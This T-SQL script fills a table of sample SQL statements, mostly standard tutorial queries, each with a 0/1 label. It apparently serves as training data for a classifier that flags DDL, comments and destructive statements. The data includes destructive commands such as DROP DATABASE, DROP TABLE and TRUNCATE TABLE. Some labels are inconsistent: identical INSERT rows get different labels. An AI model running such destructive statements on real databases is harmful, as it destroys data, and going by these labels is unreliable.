INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (181, N'SELECT * FROM Customers WHERE Country=''Germany''LIMIT 3;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (182, N'SELECT * FROM Customers WHERE Country=''Germany'' AND ROWNUM <= 3;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (183, N'SELECT MIN(Price) AS SmallestPrice FROM Products; ', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (184, N'SELECT MAX(Price) AS LargestPrice FROM Products; ', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (185, N'SELECT COUNT(ProductID) FROM Products;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (186, N'SELECT AVG(Price) FROM Products;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (187, N'SELECT SUM(Quantity) FROM OrderDetails;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (188, N'SELECT * FROM Customers WHERE CustomerName LIKE ''a%'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (189, N'SELECT * FROM Customers WHERE CustomerName LIKE ''%a'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (190, N'SELECT * FROM Customers WHERE CustomerName LIKE ''%or%''', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (191, N'SELECT * FROM Customers WHERE CustomerName LIKE ''_r%'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (192, N'SELECT * FROM Customers WHERE CustomerName LIKE ''a__%'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (193, N'SELECT * FROM Customers WHERE ContactName LIKE ''a%o'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (194, N'SELECT * FROM Customers WHERE CustomerName NOT LIKE ''a%'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (195, N'SELECT * FROM Customers WHERE City LIKE ''ber%'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (196, N'SELECT * FROM Customers WHERE City LIKE ''%es%'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (197, N'SELECT * FROM Customers WHERE City LIKE ''_ondon'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (198, N'SELECT * FROM Customers WHERE City LIKE ''L_n_on'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (199, N'SELECT * FROM Customers WHERE City LIKE ''[bsp]%'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (200, N'SELECT * FROM Customers WHERE City LIKE ''[a-c]%'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (201, N'SELECT * FROM Customers WHERE City LIKE ''[!bsp]%'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (202, N'SELECT * FROM Customers WHERE City NOT LIKE ''[bsp]%'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (203, N'SELECT * FROM Customers WHERE Country IN (''Germany'', ''France'', ''UK'');', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (204, N'SELECT * FROM Customers WHERE Country NOT IN (''Germany'', ''France'', ''UK'');', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (205, N'SELECT * FROM Customers WHERE Country IN (SELECT Country FROM Suppliers);', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (206, N'SELECT * FROM Products WHERE Price BETWEEN 10 AND 20;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (207, N'SELECT * FROM Products WHERE Price NOT BETWEEN 10 AND 20;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (208, N'SELECT * FROM Products WHERE Price BETWEEN 10 AND 20 AND CategoryID NOT IN (1,2,3);', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (209, N'SELECT * FROM Products WHERE ProductName BETWEEN ''Carnarvon Tigers'' AND ''Mozzarella di Giovanni'' ORDER BY ProductName;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (210, N'SELECT * FROM Products WHERE ProductName BETWEEN "Carnarvon Tigers" AND "Chef Anton''s Cajun Seasoning" ORDER BY ProductName;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (211, N'SELECT * FROM Products WHERE ProductName NOT BETWEEN ''Carnarvon Tigers'' AND ''Mozzarella di Giovanni'' ORDER BY ProductName;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (212, N'SELECT * FROM Orders WHERE OrderDate BETWEEN #01/07/1996# AND #31/07/1996#;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (213, N'SELECT * FROM Orders WHERE OrderDate BETWEEN ''1996-07-01'' AND ''1996-07-31'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (214, N'SELECT CustomerID AS ID, CustomerName AS Customer FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (215, N'SELECT CustomerName AS Customer, ContactName AS [Contact Person] FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (216, N'SELECT CustomerName, Address + '', '' + PostalCode + '' '' + City + '', '' + Country AS Address FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (217, N'SELECT CustomerName, CONCAT(Address,'', '',PostalCode,'', '',City,'', '',Country) AS Address FROM Customers;SELECT o.OrderID, o.OrderDate, c.CustomerName FROM Customers AS c, Orders AS o WHERE c.CustomerName=''Around the Horn'' AND c.CustomerID=o.CustomerID;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (218, N'SELECT Orders.OrderID, Orders.OrderDate, Customers.CustomerName FROM Customers, Orders WHERE Customers.CustomerName=''Around the Horn'' AND Customers.CustomerID=Orders.CustomerID;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (219, N'SELECT Orders.OrderID, Customers.CustomerName, Orders.OrderDate FROM Orders INNER JOIN Customers ON Orders.CustomerID=Customers.CustomerID;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (220, N'SELECT Orders.OrderID, Customers.CustomerName FROM Orders INNER JOIN Customers ON Orders.CustomerID = Customers.CustomerID;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (221, N'SELECT Orders.OrderID, Customers.CustomerName, Shippers.ShipperName FROM ((Orders INNER JOIN Customers ON Orders.CustomerID = Customers.CustomerID) INNER JOIN Shippers ON Orders.ShipperID = Shippers.ShipperID);', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (222, N'SELECT Customers.CustomerName, Orders.OrderID FROM Customers LEFT JOIN Orders ON Customers.CustomerID=Orders.CustomerID ORDER BY Customers.CustomerName;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (223, N'SELECT Orders.OrderID, Employees.LastName, Employees.FirstName FROM Orders RIGHT JOIN Employees ON Orders.EmployeeID = Employees.EmployeeID ORDER BY Orders.OrderID;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (224, N'SELECT Customers.CustomerName, Orders.OrderID FROM Customers FULL OUTER JOIN Orders ON Customers.CustomerID=Orders.CustomerID ORDER BY Customers.CustomerName;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (225, N'SELECT A.CustomerName AS CustomerName1, B.CustomerName AS CustomerName2, A.City FROM Customers A, Customers B WHERE A.CustomerID <> B.CustomerID AND A.City = B.City ORDER BY A.City;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (226, N'SELECT City FROM Customers UNION SELECT City FROM Suppliers ORDER BY City;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (227, N'SELECT City FROM Customers UNION ALL SELECT City FROM Suppliers ORDER BY City;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (228, N'SELECT City, Country FROM Customers WHERE Country=''Germany'' UNION SELECT City, Country FROM Suppliers WHERE Country=''Germany'' ORDER BY City;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (229, N'SELECT City, Country FROM Customers WHERE Country=''Germany'' UNION ALL SELECT City, Country FROM Suppliers WHERE Country=''Germany'' ORDER BY City;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (230, N'SELECT ''Customer'' AS Type, ContactName, City, Country FROM Customers UNION SELECT ''Supplier'', ContactName, City, Country FROM Suppliers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (231, N'SELECT COUNT(CustomerID), Country FROM Customers GROUP BY Country;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (232, N'SELECT COUNT(CustomerID), Country FROM Customers GROUP BY Country ORDER BY COUNT(CustomerID) DESC;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (233, N'SELECT Shippers.ShipperName,COUNT(Orders.OrderID) AS NumberOfOrders FROM Orders LEFT JOIN Shippers ON Orders.ShipperID = Shippers.ShipperID GROUP BY ShipperName;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (234, N'SELECT COUNT(CustomerID), Country FROM Customers GROUP BY Country HAVING COUNT(CustomerID) > 5;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (235, N'SELECT COUNT(CustomerID), Country FROM Customers GROUP BY Country HAVING COUNT(CustomerID) > 5 ORDER BY COUNT(CustomerID) DESC;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (236, N'SELECT Employees.LastName, COUNT(Orders.OrderID) AS NumberOfOrders FROM (Orders INNER JOIN Employees ON Orders.EmployeeID = Employees.EmployeeID) GROUP BY LastName HAVING COUNT(Orders.OrderID) > 10;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (237, N'SELECT Employees.LastName, COUNT(Orders.OrderID) AS NumberOfOrders FROM Orders INNER JOIN Employees ON Orders.EmployeeID = Employees.EmployeeID WHERE LastName = ''Davolio'' OR LastName = ''Fuller'' GROUP BY LastName HAVING COUNT(Orders.OrderID) > 25;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (238, N'SELECT SupplierName FROM Suppliers WHERE EXISTS (SELECT ProductName FROM Products WHERE Products.SupplierID = Suppliers.supplierID AND Price < 20);', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (239, N'SELECT SupplierName FROM Suppliers WHERE EXISTS (SELECT ProductName FROM Products WHERE Products.SupplierID = Suppliers.supplierID AND Price = 22);', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (240, N'SELECT ProductName FROM Products WHERE ProductID = ANY (SELECT ProductID FROM OrderDetails WHERE Quantity = 10);', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (241, N'SELECT ProductName FROM Products WHERE ProductID = ANY (SELECT ProductID FROM OrderDetails WHERE Quantity > 99);', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (242, N'SELECT ProductName FROM Products WHERE ProductID = ALL (SELECT ProductID FROM OrderDetails WHERE Quantity = 10);', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (243, N'SELECT * INTO CustomersBackup2017 FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (244, N'SELECT * INTO CustomersBackup2017 IN ''Backup.mdb'' FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (245, N'SELECT CustomerName, ContactName INTO CustomersBackup2017 FROM Customers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (246, N'SELECT * INTO CustomersGermany FROM Customers WHERE Country = ''Germany'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (247, N'SELECT Customers.CustomerName, Orders.OrderID INTO CustomersOrderBackup2017 FROM Customers LEFT JOIN Orders ON Customers.CustomerID = Orders.CustomerID;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (248, N'SELECT * INTO newtable FROM oldtable WHERE 1 = 0;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (249, N'INSERT INTO Customers (CustomerName, City, Country) SELECT SupplierName, City, Country FROM Suppliers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (250, N'INSERT INTO Customers (CustomerName, ContactName, Address, City, PostalCode, Country) SELECT SupplierName, ContactName, Address, City, PostalCode, Country FROM Suppliers;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (251, N'INSERT INTO Customers (CustomerName, City, Country) SELECT SupplierName, City, Country FROM Suppliers WHERE Country=''Germany'';', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (252, N'SELECT OrderID, Quantity, CASE WHEN Quantity > 30 THEN ''The quantity is greater than 30'' WHEN Quantity = 30 THEN ''The quantity is 30'' ELSE ''The quantity is under 30'' END AS QuantityText FROM OrderDetails;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (253, N'SELECT CustomerName, City, Country FROM Customers ORDER BY (CASE WHEN City IS NULL THEN Country ELSE City END);', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (254, N'SELECT ProductName, UnitPrice * (UnitsInStock + IFNULL(UnitsOnOrder, 0)) FROM Products;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (255, N'SELECT ProductName, UnitPrice * (UnitsInStock + COALESCE(UnitsOnOrder, 0)) FROM Products;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (256, N'SELECT ProductName, UnitPrice * (UnitsInStock + ISNULL(UnitsOnOrder, 0)) FROM Products;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (257, N'SELECT ProductName, UnitPrice * (UnitsInStock + IIF(IsNull(UnitsOnOrder), 0, UnitsOnOrder)) FROM Products;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (258, N'SELECT ProductName, UnitPrice * (UnitsInStock + NVL(UnitsOnOrder, 0)) FROM Products;', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (259, N'CREATE PROCEDURE SelectAllCustomers AS SELECT * FROM Customers GO;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (260, N'EXEC SelectAllCustomers;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (261, N'CREATE PROCEDURE SelectAllCustomers @City nvarchar(30) AS SELECT * FROM Customers WHERE City = @City GO;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (262, N'EXEC SelectAllCustomers @City = ''London'';', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (263, N'CREATE PROCEDURE SelectAllCustomers @City nvarchar(30), @PostalCode nvarchar(10) AS SELECT * FROM Customers WHERE City = @City AND PostalCode = @PostalCode GO;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (264, N'EXEC SelectAllCustomers @City = ''London'', @PostalCode = ''WA1 1DP'';', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (265, N'SELECT * FROM Customers -- WHERE City=''Berlin'';', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (266, N'/*Select all the columns of all the records in the Customers table:*/ SELECT * FROM Customers;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (267, N'SELECT CustomerName, /*City,*/ Country FROM Customers;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (268, N'SELECT * FROM Customers WHERE (CustomerName LIKE ''L%'' OR CustomerName LIKE ''R%'' /*OR CustomerName LIKE ''S%'' OR CustomerName LIKE ''T%''*/ OR CustomerName LIKE ''W%'') AND Country=''USA'' ORDER BY CustomerName;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (269, N'CREATE DATABASE testDB;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (270, N'DROP DATABASE testDB;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (271, N'BACKUP DATABASE testDB TO DISK = ''D:\backups\testDB.bak'';', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (272, N'BACKUP DATABASE testDB TO DISK = ''D:\backups\testDB.bak'' WITH DIFFERENTIAL;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (273, N'CREATE TABLE Persons (PersonID int, LastName varchar(255), FirstName varchar(255), Address varchar(255), City varchar(255));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (274, N'CREATE TABLE TestTable AS SELECT customername, contactname FROM customers;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (275, N'DROP TABLE Shippers;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (276, N'TRUNCATE TABLE table_name;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (277, N'ALTER TABLE Customers ADD Email varchar(255);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (278, N'ALTER TABLE Customers DROP COLUMN Email;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (279, N'ALTER TABLE Persons ADD DateOfBirth date;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (280, N'ALTER TABLE Persons ALTER COLUMN DateOfBirth year;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (281, N'ALTER TABLE Persons DROP COLUMN DateOfBirth;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (282, N'CREATE TABLE Persons (ID int NOT NULL, LastName varchar(255) NOT NULL, FirstName varchar(255) NOT NULL, Age int);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (283, N'ALTER TABLE Persons MODIFY Age int NOT NULL;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (284, N'CREATE TABLE Persons (ID int NOT NULL UNIQUE, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (285, N'CREATE TABLE Persons (ID int NOT NULL, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int, UNIQUE (ID));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (286, N'CREATE TABLE Persons (ID int NOT NULL, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int, CONSTRAINT UC_Person UNIQUE (ID,LastName));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (287, N'ALTER TABLE Persons ADD UNIQUE (ID);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (288, N'ALTER TABLE Persons DROP INDEX UC_Person;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (289, N'ALTER TABLE Persons DROP CONSTRAINT UC_Person;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (290, N'CREATE TABLE Persons ( D int NOT NULL, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int, PRIMARY KEY (ID));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (291, N'CREATE TABLE Persons (ID int NOT NULL PRIMARY KEY, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (292, N'CREATE TABLE Persons (ID int NOT NULL, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int, CONSTRAINT PK_Person PRIMARY KEY (ID,LastName));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (293, N'ALTER TABLE Persons ADD PRIMARY KEY (ID);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (294, N'ALTER TABLE Persons ADD CONSTRAINT PK_Person PRIMARY KEY (ID,LastName);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (295, N'ALTER TABLE Persons DROP PRIMARY KEY;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (296, N'ALTER TABLE Persons DROP CONSTRAINT PK_Person;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (297, N'CREATE TABLE Orders ( OrderID int NOT NULL, OrderNumber int NOT NULL, PersonID int, PRIMARY KEY (OrderID), FOREIGN KEY (PersonID) REFERENCES Persons(PersonID));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (298, N'CREATE TABLE Orders ( OrderID int NOT NULL PRIMARY KEY, OrderNumber int NOT NULL, PersonID int FOREIGN KEY REFERENCES Persons(PersonID));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (299, N'CREATE TABLE Orders (OrderID int NOT NULL, OrderNumber int NOT NULL, PersonID int, PRIMARY KEY (OrderID), CONSTRAINT FK_PersonOrder FOREIGN KEY (PersonID) REFERENCES Persons(PersonID));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (300, N'ALTER TABLE Orders ADD FOREIGN KEY (PersonID) REFERENCES Persons(PersonID);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (301, N'ALTER TABLE Orders ADD CONSTRAINT FK_PersonOrder FOREIGN KEY (PersonID) REFERENCES Persons(PersonID);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (302, N'ALTER TABLE Orders DROP FOREIGN KEY FK_PersonOrder;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (303, N'ALTER TABLE Orders DROP CONSTRAINT FK_PersonOrder;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (304, N'CREATE TABLE Persons (ID int NOT NULL, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int, CHECK (Age>=18));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (305, N'CREATE TABLE Persons ( ID int NOT NULL, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int CHECK (Age>=18));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (306, N'CREATE TABLE Persons (ID int NOT NULL, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int, City varchar(255), CONSTRAINT CHK_Person CHECK (Age>=18 AND City=''Sandnes''));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (307, N'ALTER TABLE Persons ADD CHECK (Age>=18);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (308, N'ALTER TABLE Persons ADD CONSTRAINT CHK_PersonAge CHECK (Age>=18 AND City=''Sandnes'');', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (309, N'ALTER TABLE Persons DROP CONSTRAINT CHK_PersonAge;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (310, N'ALTER TABLE Persons DROP CHECK CHK_PersonAge;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (311, N'CREATE TABLE Persons (ID int NOT NULL, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int, City varchar(255) DEFAULT ''Sandnes'');', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (312, N'CREATE TABLE Orders (ID int NOT NULL, OrderNumber int NOT NULL, OrderDate date DEFAULT GETDATE());', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (313, N'ALTER TABLE Persons ALTER City SET DEFAULT ''Sandnes'';', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (314, N'ALTER TABLE Persons ADD CONSTRAINT df_City DEFAULT ''Sandnes'' FOR City;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (315, N'ALTER TABLE Persons ALTER COLUMN City SET DEFAULT ''Sandnes'';', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (316, N'ALTER TABLE Persons MODIFY City DEFAULT ''Sandnes'';', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (317, N'ALTER TABLE Persons ALTER City DROP DEFAULT;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (318, N'ALTER TABLE Persons ALTER COLUMN City DROP DEFAULT;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (319, N'CREATE INDEX idx_lastname ON Persons (LastName);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (320, N'CREATE INDEX idx_pname ON Persons (LastName, FirstName);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (321, N'DROP INDEX index_name ON table_name;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (322, N'DROP INDEX table_name.index_name;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (323, N'DROP INDEX index_name;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (324, N'ALTER TABLE table_name DROP INDEX index_name;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (325, N'CREATE TABLE Persons (Personid int NOT NULL AUTO_INCREMENT, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int, PRIMARY KEY (Personid));', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (326, N'ALTER TABLE Persons AUTO_INCREMENT=100;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (327, N'INSERT INTO Persons (FirstName,LastName)VALUES (''Lars'',''Monsen'');', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (328, N'CREATE TABLE Persons ( Personid int IDENTITY(1,1) PRIMARY KEY, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (329, N'INSERT INTO Persons (FirstName,LastName) VALUES (''Lars'',''Monsen'');', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (330, N'CREATE TABLE Persons ( Personid AUTOINCREMENT PRIMARY KEY, LastName varchar(255) NOT NULL, FirstName varchar(255), Age int);', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (331, N'INSERT INTO Persons (FirstName,LastName) VALUES (''Lars'',''Monsen'');', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (332, N'CREATE SEQUENCE seq_person MINVALUE 1 START WITH 1 INCREMENT BY 1 CACHE 10;', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (333, N'INSERT INTO Persons (Personid,FirstName,LastName) VALUES (seq_person.nextval,''Lars'',''Monsen'');', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (334, N'SELECT * FROM Orders WHERE OrderDate=''2008-11-11''', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (335, N'CREATE VIEW [Brazil Customers] AS SELECT CustomerName, ContactName FROM Customers WHERE Country = ''Brazil'';', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (336, N'SELECT * FROM [Brazil Customers];', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (337, N'CREATE VIEW [Products Above Average Price] AS SELECT ProductName, Price FROM Products WHERE Price > (SELECT AVG(Price) FROM Products); ', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (338, N'SELECT * FROM [Products Above Average Price];', 0)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (339, N'CREATE OR REPLACE VIEW [Brazil Customers] AS SELECT CustomerName, ContactName, City FROM Customers WHERE Country = ''Brazil'';', 1)
INSERT INTO [dbo].[sql_commands] ([Id], [Text], [Label]) VALUES (340, N'DROP VIEW [Brazil Customers];', 1)
